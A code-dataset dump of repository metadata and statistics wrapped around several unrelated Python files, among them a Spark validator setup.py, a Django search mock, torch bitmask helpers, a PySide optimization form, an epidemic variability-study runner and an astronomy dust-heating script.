] | 2 | 2018-04-13T20:54:16.000Z | 2018-05-01T01:11:32.000Z | validator/setup.py | acmiyaguchi/schema-validator | 04d265bb9359107580f8726bce5102b14a68f156 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from setuptools import setup
setup(
name='validator',
version='0.1.0',
author='Anthony Miyaguchi',
author_email='amiyaguchi@mozilla.com',
description='Spark schema validation job',
url='https://github.com/acmiyaguchi/schema-validator',
install_requires=[
"pyspark",
"click",
"jsonschema",
],
packages=['validator'],
package_dir={'validator': 'validator'},
)
| 22.095238 | 58 | 0.637931 | 49 | 464 | 5.979592 | 0.816327 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01084 | 0.204741 | 464 | 20 | 59 | 23.2 | 0.783198 | 0.077586 | 0 | 0 | 0 | 0 | 0.413146 | 0.051643 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3210ad0eb9f3c039c04a54147643c60d613ffab0 | 429 | py | Python | tests/mocks.py | Mahir-Sparkess/django-haystack-elasticsearch | dd47f0e9c492908d4cc090ad4377fe7fc5e5efb8 | [
"BSD-3-Clause"
] | 25 | 2016-12-29T14:08:00.000Z | 2019-03-08T06:41:02.000Z | tests/mocks.py | Mahir-Sparkess/django-haystack-elasticsearch | dd47f0e9c492908d4cc090ad4377fe7fc5e5efb8 | [
"BSD-3-Clause"
] | 3 | 2017-05-02T14:55:31.000Z | 2021-11-15T17:47:04.000Z | tests/mocks.py | Mahir-Sparkess/django-haystack-elasticsearch | dd47f0e9c492908d4cc090ad4377fe7fc5e5efb8 | [
"BSD-3-Clause"
] | 14 | 2017-01-12T03:33:43.000Z | 2021-05-10T04:39:37.000Z | # encoding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from django.apps import apps
from haystack.models import SearchResult
class MockSearchResult(SearchResult):
def __init__(self, app_label, model_name, pk, score, **kwargs):
super(MockSearchResult, self).__init__(app_label, model_name, pk, score, **kwargs)
self._model = apps.get_model('core', model_name)
| 33 | 90 | 0.762238 | 55 | 429 | 5.545455 | 0.581818 | 0.088525 | 0.085246 | 0.111475 | 0.196721 | 0.196721 | 0.196721 | 0 | 0 | 0 | 0 | 0.002717 | 0.142191 | 429 | 12 | 91 | 35.75 | 0.826087 | 0.034965 | 0 | 0 | 0 | 0 | 0.009709 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0 | 0.714286 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
32123a8dc6e051f2c7fb4618cac502b6d5f56cc8 | 1,520 | py | Python | src/utils/boolmask.py | r39ashmi/LastMileRoutingResearchChallenge | 529fd68c69393501e0aedc55e957f927608eb393 | [
"MIT"
] | null | null | null | src/utils/boolmask.py | r39ashmi/LastMileRoutingResearchChallenge | 529fd68c69393501e0aedc55e957f927608eb393 | [
"MIT"
] | null | null | null | src/utils/boolmask.py | r39ashmi/LastMileRoutingResearchChallenge | 529fd68c69393501e0aedc55e957f927608eb393 | [
"MIT"
] | 1 | 2022-02-06T07:27:49.000Z | 2022-02-06T07:27:49.000Z | import torch
def _mask_long2byte(mask, n=None):
if n is None:
n = 8 * mask.size(-1)
return (mask[..., None] >> (torch.arange(8, out=mask.new()) * 8))[..., :n].to(torch.uint8).view(*mask.size()[:-1], -1)[..., :n]
def _mask_byte2bool(mask, n=None):
if n is None:
n = 8 * mask.size(-1)
return (mask[..., None] & (mask.new_ones(8) << torch.arange(8, out=mask.new()) * 1)).view(*mask.size()[:-1], -1)[..., :n] > 0
def mask_long2bool(mask, n=None):
assert mask.dtype == torch.int64
return _mask_byte2bool(_mask_long2byte(mask), n=n)
def mask_long_scatter(mask, values, check_unset=True):
"""
Sets values in mask in dimension -1 with arbitrary batch dimensions
If values contains -1, nothing is set
Note: does not work for setting multiple values at once (like normal scatter)
"""
assert mask.size()[:-1] == values.size()
rng = torch.arange(mask.size(-1), out=mask.new())
values_ = values[..., None] # Need to broadcast up do mask dim
# This indicates in which value of the mask a bit should be set
where = (values_ >= (rng * 64)) & (values_ < ((rng + 1) * 64))
# Optional: check that bit is not already set
assert not (check_unset and ((mask & (where.long() << (values_ % 64))) > 0).any())
# Set bit by shifting a 1 to the correct position
# (% not strictly necessary as bitshift is cyclic)
# since where is 0 if no value needs to be set, the bitshift has no effect
return mask | (where.long() << (values_ % 64))
| 40 | 131 | 0.621711 | 237 | 1,520 | 3.907173 | 0.379747 | 0.051836 | 0.058315 | 0.038877 | 0.218143 | 0.172786 | 0.092873 | 0.092873 | 0.092873 | 0.092873 | 0 | 0.031852 | 0.215132 | 1,520 | 37 | 132 | 41.081081 | 0.744342 | 0.324342 | 0 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.210526 | false | 0 | 0.052632 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
32147d157b7f67d07b64ae72daa2b900f0c45344 | 1,401 | py | Python | w20data.py | zhuligs/Pallas | c8d77d0963c080fa7331560f1659001488b0328f | [
"MIT"
] | null | null | null | w20data.py | zhuligs/Pallas | c8d77d0963c080fa7331560f1659001488b0328f | [
"MIT"
] | null | null | null | w20data.py | zhuligs/Pallas | c8d77d0963c080fa7331560f1659001488b0328f | [
"MIT"
] | null | null | null | import fppy
class Wstorage(object):
def __init__(self, ediff=0.001, fpdiff=0.001,
ntyp=None):
self.minima = []
self.saddle = []
self.ediff = float(ediff)
self.fpdiff = float(fpdiff)
self.ntyp = ntyp
# self.types = types
def add_minima(self, new):
for m in self.minima:
if self.compare(new, m):
return m
newid = len(self.minima) + 1
new.set_iden(newid)
new.set_name('M' + str(newid))
self.minima.append(new)
return new
def add_saddle(self, new, m1, m2):
id1 = m1.get_iden()
id2 = m2.get_iden()
for s in self.saddle:
if self.compare(new, s):
s.add_conn(id1)
s.add_conn(id2)
retrun s
newid = len(self.saddle) + 1
new.set_iden(newid)
new.add_conn(id1)
new.add_conn(id2)
new.set_name('S' + str(newid))
self.saddle.append(new)
return new
def compare(self, cell1, cell2):
fp1 = cell1.get_lfp()
fp2 = cell2.get_lfp()
e1 = cell1.get_e()
e2 = cell2.get_e()
types = cell1.get_types()
(dist, m) = fppy.fp_dist(self.ntyp, types, fp1, fp2)
if dist < self.fpdiff and abs(e1-e2) < self.ediff:
return True
else:
return False
| 28.591837 | 60 | 0.511777 | 186 | 1,401 | 3.736559 | 0.306452 | 0.057554 | 0.03741 | 0.046043 | 0.115108 | 0.054676 | 0 | 0 | 0 | 0 | 0 | 0.039728 | 0.371163 | 1,401 | 48 | 61 | 29.1875 | 0.749149 | 0.012848 | 0 | 0.090909 | 0 | 0 | 0.001448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.022727 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3215f19ecc641f982700a40585e4986b5ee1a928 | 467 | py | Python | tests/script/tavern_chars.py | ufosc/MuddySwamp | 2e28f9db1f0f4e1c4aafccdf7f58bf2a22b82366 | [
"MIT"
] | 10 | 2018-10-14T00:29:27.000Z | 2020-05-02T23:59:30.000Z | tests/script/tavern_chars.py | ufosc/MuddySwamp | 2e28f9db1f0f4e1c4aafccdf7f58bf2a22b82366 | [
"MIT"
] | 36 | 2018-06-13T05:48:10.000Z | 2020-02-05T18:51:52.000Z | tests/script/tavern_chars.py | ufosc/MuddySwamp | 2e28f9db1f0f4e1c4aafccdf7f58bf2a22b82366 | [
"MIT"
] | 8 | 2018-08-30T03:13:13.000Z | 2020-05-15T21:42:52.000Z | """a few CharacterClasses for testing the 'find' method
(see save 'tavern.yaml')"""
from swampymud.character import Character
class Humanoid(Character):
"""a base class for all other classes in this group"""
class Merchant(Humanoid):
"""good with coin (especially other people's)"""
class Wizard(Humanoid):
"""masters of the perplexing arts"""
class Thug(Humanoid):
"""hired hands of few scruples"""
class Thief(Humanoid):
"""sneaky folks"""
| 24.578947 | 58 | 0.700214 | 61 | 467 | 5.360656 | 0.721311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167024 | 467 | 18 | 59 | 25.944444 | 0.840617 | 0.51606 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
32164d5e1796ce8618580e0c6f7288cde383f143 | 256 | py | Python | iptfe/blog/urls.py | I-prefer-the-front-end/I-prefer-the-front-end | 62e3c3e6b40ea350104bde5bd99bc88065506234 | [
"MIT"
] | null | null | null | iptfe/blog/urls.py | I-prefer-the-front-end/I-prefer-the-front-end | 62e3c3e6b40ea350104bde5bd99bc88065506234 | [
"MIT"
] | null | null | null | iptfe/blog/urls.py | I-prefer-the-front-end/I-prefer-the-front-end | 62e3c3e6b40ea350104bde5bd99bc88065506234 | [
"MIT"
] | null | null | null | from django.conf.urls import url
from blog import views
urlpatterns = [
url(r'^archive/$', views.archive, name='archive'),
url(r'^comment/$', views.comment, name='comment'),
url(r'^(?P<slug>[A-Za-z0-9_\-.]+)?/?$', views.post, name='post'),
]
| 25.6 | 69 | 0.617188 | 37 | 256 | 4.243243 | 0.540541 | 0.076433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00905 | 0.136719 | 256 | 9 | 70 | 28.444444 | 0.701357 | 0 | 0 | 0 | 0 | 0 | 0.269531 | 0.121094 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
32165aca27fde8f36646a522b8ab5e04657a70e7 | 10,473 | py | Python | gui/qt_ui/OptimizationQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 7 | 2018-11-18T07:11:05.000Z | 2021-05-06T21:53:40.000Z | gui/qt_ui/OptimizationQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 9 | 2019-09-23T16:34:09.000Z | 2020-05-26T18:49:43.000Z | gui/qt_ui/OptimizationQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 2 | 2019-04-18T14:34:31.000Z | 2019-06-19T19:34:33.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\Victor\Dropbox\DFR\film2dose\qt_ui\evo_widget.ui'
#
# Created: Tue Sep 29 14:54:23 2015
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(1161, 691)
self.gridLayout = QtGui.QGridLayout(Form)
self.gridLayout.setObjectName("gridLayout")
self.optimize_button = QtGui.QPushButton(Form)
self.optimize_button.setObjectName("optimize_button")
self.gridLayout.addWidget(self.optimize_button, 12, 1, 1, 1)
self.pop_spin = QtGui.QSpinBox(Form)
self.pop_spin.setMaximum(5000)
self.pop_spin.setProperty("value", 200)
self.pop_spin.setObjectName("pop_spin")
self.gridLayout.addWidget(self.pop_spin, 7, 0, 1, 1)
self.label_5 = QtGui.QLabel(Form)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 6, 0, 1, 1)
self.crop_border_spin = QtGui.QDoubleSpinBox(Form)
self.crop_border_spin.setSingleStep(0.1)
self.crop_border_spin.setProperty("value", 5.0)
self.crop_border_spin.setObjectName("crop_border_spin")
self.gridLayout.addWidget(self.crop_border_spin, 4, 1, 1, 1)
self.label_2 = QtGui.QLabel(Form)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 3, 0, 1, 1)
self.eq_combo = QtGui.QComboBox(Form)
self.eq_combo.setObjectName("eq_combo")
self.eq_combo.addItem("")
self.eq_combo.addItem("")
self.eq_combo.addItem("")
self.eq_combo.addItem("")
self.gridLayout.addWidget(self.eq_combo, 9, 0, 1, 1)
self.mode_combo = QtGui.QComboBox(Form)
self.mode_combo.setObjectName("mode_combo")
self.mode_combo.addItem("")
self.mode_combo.addItem("")
self.mode_combo.addItem("")
self.gridLayout.addWidget(self.mode_combo, 9, 1, 1, 1)
self.label_8 = QtGui.QLabel(Form)
self.label_8.setObjectName("label_8")
self.gridLayout.addWidget(self.label_8, 2, 0, 1, 1)
self.setup_button = QtGui.QPushButton(Form)
self.setup_button.setObjectName("setup_button")
self.gridLayout.addWidget(self.setup_button, 12, 0, 1, 1)
self.label_4 = QtGui.QLabel(Form)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 8, 0, 1, 1)
self.color_combo = QtGui.QComboBox(Form)
self.color_combo.setObjectName("color_combo")
self.color_combo.addItem("")
self.color_combo.addItem("")
self.color_combo.addItem("")
self.gridLayout.addWidget(self.color_combo, 2, 1, 1, 1)
self.label_6 = QtGui.QLabel(Form)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 6, 1, 1, 1)
self.pixel_size_spin = QtGui.QDoubleSpinBox(Form)
self.pixel_size_spin.setProperty("value", 1.0)
self.pixel_size_spin.setObjectName("pixel_size_spin")
self.gridLayout.addWidget(self.pixel_size_spin, 4, 0, 1, 1)
self.label = QtGui.QLabel(Form)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 3, 1, 1, 1)
self.poly_range_spin = QtGui.QDoubleSpinBox(Form)
self.poly_range_spin.setMaximum(1000000.0)
self.poly_range_spin.setProperty("value", 1.0)
self.poly_range_spin.setObjectName("poly_range_spin")
self.gridLayout.addWidget(self.poly_range_spin, 7, 1, 1, 1)
self.label_3 = QtGui.QLabel(Form)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 8, 1, 1, 1)
self.save_cal = QtGui.QPushButton(Form)
self.save_cal.setObjectName("save_cal")
self.gridLayout.addWidget(self.save_cal, 13, 1, 1, 1)
self.label_7 = QtGui.QLabel(Form)
self.label_7.setObjectName("label_7")
self.gridLayout.addWidget(self.label_7, 14, 0, 1, 1)
self.seed_spin = QtGui.QSpinBox(Form)
self.seed_spin.setProperty("value", 1)
self.seed_spin.setObjectName("seed_spin")
self.gridLayout.addWidget(self.seed_spin, 14, 1, 1, 1)
self.image_widget = QtGui.QWidget(Form)
self.image_widget.setObjectName("image_widget")
self.gridLayout.addWidget(self.image_widget, 10, 1, 1, 1)
self.ref_widget = QtGui.QWidget(Form)
self.ref_widget.setObjectName("ref_widget")
self.gridLayout.addWidget(self.ref_widget, 10, 0, 1, 1)
self.bg_checkBox = QtGui.QCheckBox(Form)
self.bg_checkBox.setChecked(False)
self.bg_checkBox.setObjectName("bg_checkBox")
self.gridLayout.addWidget(self.bg_checkBox, 1, 0, 1, 1)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Optimization ", None, QtGui.QApplication.UnicodeUTF8))
self.optimize_button.setText(
QtGui.QApplication.translate("Form", "Optimize", None, QtGui.QApplication.UnicodeUTF8))
self.label_5.setText(QtGui.QApplication.translate("Form",
"<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Population size</span></p></body></html>",
None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Form",
"<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Optimization pixel size (mm)</span></p></body></html>",
None, QtGui.QApplication.UnicodeUTF8))
self.eq_combo.setItemText(0, QtGui.QApplication.translate("Form", "Equation 1 - Inverse Log poly", None,
QtGui.QApplication.UnicodeUTF8))
self.eq_combo.setItemText(1, QtGui.QApplication.translate("Form", "Equation 2 - Inverse poly", None,
QtGui.QApplication.UnicodeUTF8))
self.eq_combo.setItemText(2, QtGui.QApplication.translate("Form", "Equation 3 - Inverse arctan poly", None,
QtGui.QApplication.UnicodeUTF8))
self.eq_combo.setItemText(3, QtGui.QApplication.translate("Form", "Equation 4 - 4th Degree Poly", None,
QtGui.QApplication.UnicodeUTF8))
self.mode_combo.setItemText(0, QtGui.QApplication.translate("Form", "Polynomial curve fitting ", None,
QtGui.QApplication.UnicodeUTF8))
self.mode_combo.setItemText(1, QtGui.QApplication.translate("Form", "Lateral correction", None,
QtGui.QApplication.UnicodeUTF8))
self.mode_combo.setItemText(2, QtGui.QApplication.translate("Form", "Poly fit and correction", None,
QtGui.QApplication.UnicodeUTF8))
self.label_8.setText(QtGui.QApplication.translate("Form",
"<html><head/><body><p align=\"right\"><span style=\" font-weight:600;\">Color Channel:</span></p></body></html>",
None, QtGui.QApplication.UnicodeUTF8))
self.setup_button.setText(
QtGui.QApplication.translate("Form", "Setup optimization", None, QtGui.QApplication.UnicodeUTF8))
self.label_4.setText(QtGui.QApplication.translate("Form",
"<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Select Equation</span></p></body></html>",
None, QtGui.QApplication.UnicodeUTF8))
self.color_combo.setItemText(0,
QtGui.QApplication.translate("Form", "Red", None, QtGui.QApplication.UnicodeUTF8))
self.color_combo.setItemText(1, QtGui.QApplication.translate("Form", "Green", None,
QtGui.QApplication.UnicodeUTF8))
self.color_combo.setItemText(2,
QtGui.QApplication.translate("Form", "Blue", None, QtGui.QApplication.UnicodeUTF8))
self.label_6.setText(QtGui.QApplication.translate("Form",
"<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Poly bounds (+-)</span></p></body></html>",
None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form",
"<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Crop border (mm)</span></p></body></html>",
None, QtGui.QApplication.UnicodeUTF8))
self.label_3.setText(QtGui.QApplication.translate("Form",
"<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Method</span></p></body></html>",
None, QtGui.QApplication.UnicodeUTF8))
self.save_cal.setText(QtGui.QApplication.translate("Form", "Save optimized calibration object", None,
QtGui.QApplication.UnicodeUTF8))
self.label_7.setText(QtGui.QApplication.translate("Form",
"<html><head/><body><p align=\"right\"><span style=\" font-weight:600;\">Random generator seed:</span></p></body></html>",
None, QtGui.QApplication.UnicodeUTF8))
self.bg_checkBox.setText(
QtGui.QApplication.translate("Form", "Background compensation", None, QtGui.QApplication.UnicodeUTF8))
| 64.648148 | 187 | 0.584264 | 1,146 | 10,473 | 5.213787 | 0.139616 | 0.130879 | 0.100084 | 0.115481 | 0.655397 | 0.437824 | 0.343766 | 0.297071 | 0.243347 | 0.159498 | 0 | 0.032738 | 0.288361 | 10,473 | 161 | 188 | 65.049689 | 0.768952 | 0.025781 | 0 | 0.182432 | 1 | 0 | 0.129083 | 0.040412 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013514 | false | 0 | 0.006757 | 0 | 0.027027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3218111e5ba3d23ed7e14e3bec03d4945cc872d0 | 713 | py | Python | bin_env/MapperData.py | ArChiiii/TSP_DRL_PtrNet | 8218a508c563d9641b341dff5a6241d90e4e031b | [
"MIT"
] | null | null | null | bin_env/MapperData.py | ArChiiii/TSP_DRL_PtrNet | 8218a508c563d9641b341dff5a6241d90e4e031b | [
"MIT"
] | null | null | null | bin_env/MapperData.py | ArChiiii/TSP_DRL_PtrNet | 8218a508c563d9641b341dff5a6241d90e4e031b | [
"MIT"
] | null | null | null |
from dataclasses import dataclass
from typing import List
from enum import Enum
class IterationResult(Enum):
Success = 1
Failure = 2
BiggerThanBestContainer = 3
SmallerThanCombinedImages = 4
@dataclass
class ContainerStats():
rectangleAddAttempts: int
nbrCellsGenerated: int
lowestFreeHeightDeficit: int
@dataclass(order=True)
class BoxInfo():
height: int
width: int
@dataclass
class MappedBoxInfo():
x: int
y: int
boxInfo: BoxInfo
@dataclass
class IterationStats():
result: IterationResult
maxContainerWidth: int
maxContainerHeight: int
intermediateSpriteWidth: int
intermediateSpriteHeight: int
boxDetails: List[MappedBoxInfo]
| 16.581395 | 35 | 0.730715 | 66 | 713 | 7.893939 | 0.560606 | 0.080614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007105 | 0.210379 | 713 | 42 | 36 | 16.97619 | 0.918295 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
3219b2872136a395e8a2e3e3549ad44159209de5 | 2,661 | py | Python | scripts/variability_study_run.py | cshunk/covidsim | 9776efb0726af4f59b83fe6afcc9b7e6b9e967aa | [
"BSD-2-Clause"
] | null | null | null | scripts/variability_study_run.py | cshunk/covidsim | 9776efb0726af4f59b83fe6afcc9b7e6b9e967aa | [
"BSD-2-Clause"
] | null | null | null | scripts/variability_study_run.py | cshunk/covidsim | 9776efb0726af4f59b83fe6afcc9b7e6b9e967aa | [
"BSD-2-Clause"
] | 1 | 2021-03-08T16:48:38.000Z | 2021-03-08T16:48:38.000Z | """
Runs the susceptibility variability study.
Modify the params variable to set the parameters of the study.
Parameters:
pInfect: Rate of infection
pRemove: Rate of removal
pInfected: Starting percent of population that is infected
population: Approximate population of the test. Note: for certain network types (powerlaw cutoff) this
will only be approximate in order to maintain network statistical properties.
time_scale: Multiplier that converts model time units to days.
days_to_run: Cutoff number of days for model run.
variability_method: Method with which to vary the susceptibility of individuals. "constant", "gamma",
or "balanced_polynomial".
variability_param1: First parameter for variability method. For "balanced_polynomial", this is the exponent
to which a random fraction is raised. For "gamma", this is the shape of the gamma function.
For "constant", this is the susceptibility that will be applied to all individuals.
variability_param2: Second parameter for variability method. For "gamma", this is the scale of the gamma function.
intervention_1: A string representing the first intervention. The intervention will be applied from a start
day until an end day and have a certain percent chance per individual of cancelling an
infection. The string should be formatted "{day_start}, {day_end}, {effectiveness}".
intervention_2: A string representing a second intervention.
"""
import epyc
from dataclasses import asdict
from covidsim.experiments.variability_study import VariabilityExperiment
from covidsim.datastructures import VariabilityStudyParams
# TODO: Add UI to set / save / reload parameters.
params = VariabilityStudyParams()
params.pInfect = 0.5
params.pRemove = 0.04
params.pInfected = 0.002
params.population = 5000
params.time_scale = .5
params.days_to_run = 350
params.network_type = 'powerlaw_cutoff'
params.variability_method = 'constant'
params.variability_param_1 = 0.058
params.variability_param_2 = 1
# params.intervention_1 = "18, 50, 0.5"
# params.intervention_2 = "100, 120, 0.1"
def main():
e = VariabilityExperiment(params)
# TODO: Add capability to save study file in user-specified location
nb = epyc.JSONLabNotebook('variability-study.json')
lab = epyc.Lab(nb)
for key in asdict(params):
lab[key] = asdict(params)[key]
lab.runExperiment(epyc.RepeatedExperiment(e, 7))
if __name__ == "__main__":
main()
| 40.318182 | 119 | 0.706877 | 338 | 2,661 | 5.467456 | 0.414201 | 0.010823 | 0.019481 | 0.031385 | 0.051407 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021941 | 0.229237 | 2,661 | 65 | 120 | 40.938462 | 0.879083 | 0.692973 | 0 | 0 | 0 | 0 | 0.065839 | 0.027329 | 0 | 0 | 0 | 0.015385 | 0 | 1 | 0.041667 | false | 0 | 0.166667 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c4f330b1eecb840bd796102bfa5afeb13757022 | 410 | py | Python | aula2/exercicio1.py | ArseniumGX/bluemer-modulo1-python | 2f7c69252a9a86cc573c192d1d9685b0c20466f8 | [
"MIT"
] | null | null | null | aula2/exercicio1.py | ArseniumGX/bluemer-modulo1-python | 2f7c69252a9a86cc573c192d1d9685b0c20466f8 | [
"MIT"
] | null | null | null | aula2/exercicio1.py | ArseniumGX/bluemer-modulo1-python | 2f7c69252a9a86cc573c192d1d9685b0c20466f8 | [
"MIT"
] | null | null | null | """ 01
E os 10% do garçom?**
Defina uma variável para o valor de uma refeição que custou R$ 42,54;
Defina uma variável para o valor da taxa de serviço que é de 10%;
Defina uma variável que calcula o valor total da conta e exiba-o no console com essa
formatação: R$ XXXX.XX.
"""
valor = 42.54
taxa = 10
total = valor + ((valor*taxa)/100)
print(f'O valor total é: R$ {total:.2f}') | 22.777778 | 88 | 0.65122 | 74 | 410 | 3.608108 | 0.513514 | 0.089888 | 0.191011 | 0.157303 | 0.202247 | 0.202247 | 0 | 0 | 0 | 0 | 0 | 0.064935 | 0.24878 | 410 | 18 | 89 | 22.777778 | 0.801948 | 0.668293 | 0 | 0 | 0 | 0 | 0.295238 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c4fcde5d930a8c52566bd9877af8e54344d9963 | 9,969 | py | Python | CAAPR/CAAPR_AstroMagic/PTS/pts/do/modeling/seba/check_heating.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 7 | 2016-05-20T21:56:39.000Z | 2022-02-07T21:09:48.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/do/modeling/seba/check_heating.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2019-03-21T16:10:04.000Z | 2019-03-22T17:21:56.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/do/modeling/seba/check_heating.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2020-05-19T16:17:17.000Z | 2020-05-19T16:17:17.000Z | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.do.modeling.check_heating
# -----------------------------------------------------------------
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import rc
rc('text', usetex=True)
import astropy.io.fits as pyfits
from scipy import interpolate
from scipy import integrate
def main():
outpath = "modelChecks/iteration5_J14/"
inpath = "SKIRTOutput/iteration5_J14/"
inSED = "M31_212full_i77.5_sed.dat"
Lsun = 3.846e26 # Watts
# load SEDs
input = np.loadtxt(inpath+inSED)
wavelengths = input[:,0]
# Load the widths of the wavelength bins. Crucial for integration!
delta_wls = np.loadtxt("SKIRTOutput/iteration5_J14/M31_reference_wavelengths512.dat", usecols=(1,))
#only consider wavelengths longwards of 10 micron. For speed and memory
startwl = next(wl[0] for wl in enumerate(wavelengths) if wl[1] > 10.)
coldstartwl = next(wl[0] for wl in enumerate(wavelengths) if wl[1] > 100.)
# produce wavelength ranges for all, warm and cold dust.
dustwls = wavelengths[startwl:]
